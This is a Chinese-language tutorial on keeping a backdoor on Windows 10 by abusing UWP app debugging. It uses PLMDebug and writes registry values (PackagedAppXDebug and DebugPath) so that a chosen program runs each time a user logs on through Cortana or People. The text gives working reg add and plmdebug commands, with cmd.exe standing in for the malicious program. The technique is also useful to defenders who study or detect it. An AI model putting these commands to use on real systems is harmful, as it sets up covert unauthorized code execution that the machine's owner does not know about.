Windows通用应用平台UWP持久化

START

0x01前言

这种权限维持方式也是一种自启动后门，但仅支持Windows10通用应用平台（UWP）上的应用程序，如：Cortana和People，通过将它置于调试模式后并配合Process Monitor工具可以找到UWP应用对应的注册表位置，然后修改为我们要执行的恶意程序，当目标机器注销/重启系统登录时就会执行这个恶意程序，原文地址：https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx。

0x02列出软件包名称

首先我们需要找出当前系统完整的软件包名称，因为后边PLMDebug调试时要用到，可以使用以下命令列出所有的软件包，这里仅显示name、packagefullname。

Get-AppxPackage | select name,packagefullname

0x03安装PLMDebug

PLMDebug.exe包含在Windows调试工具中，所以我们只需要安装Windows 10 SDK即可，安装过程中只要选择“Debugging Tools for Windows”这一项就好了。

0x04调试Cortana软件包

使用以下命令调试Cortana软件包，然后在开始菜单中打开Cortana，胡乱点一下，稍等片刻即可弹出cmd.exe。

plmdebug.exe /enabledebug Microsoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewy C:WindowsSystem32cmd.exe

Process Monitor监视到了它的注册表位置，而且发现写入了大量相关注册表项和值，所有注册表项的值都是：C:WindowsSystem32cmd.exe，不过只要注销/重启系统后就没有了。还在调试过程中发现这些行为都是由sihost.exe产生，所以我们只要在Process Monitor过滤器中仅显示包含sihost.exe进程即可显示出来。

0x05修改Cortana注册表

通过以下两条命令都可以实现持久化，方法都是一样的，只是注册表位置不一样，第一条会损坏原有的Cortana程序，无法正常运行，第二条不会损坏原有的Cortana程序，可以正常运行。修改以下注册表项时必须确定与你当前系统的UWP应用程序版本相对应，否则后门不会被触发。

People人脉：

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPackagedAppXDebugMicrosoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe /d "C:WindowsSystem32cmd.exe"
reg add HKCUSoftwareClassesActivatableClassesPackageMicrosoft.People_10.1807.2131.0_x64__8wekyb3d8bbweDebugInformationx4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:WindowsSystem32cmd.exe"

Cortana(小娜)：

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPackagedAppXDebugMicrosoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewy /d "C:WindowsSystem32cmd.exe"
reg add HKCUSoftwareClassesActivatableClassesPackageMicrosoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewyDebugInformationCortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:WindowsSystem32cmd.exe"

注：笔者在当前测试环境下设置好了Cortana后门，在注销/重启系统登录时会执行1次，进入系统后每间隔5-20分钟左右会执行1次，这应该是微软后台自动运行了Cortana(小娜)，所以会再次触发该后门，没有找到相关资料，具体原因不清楚，全靠猜，0.0 ！！！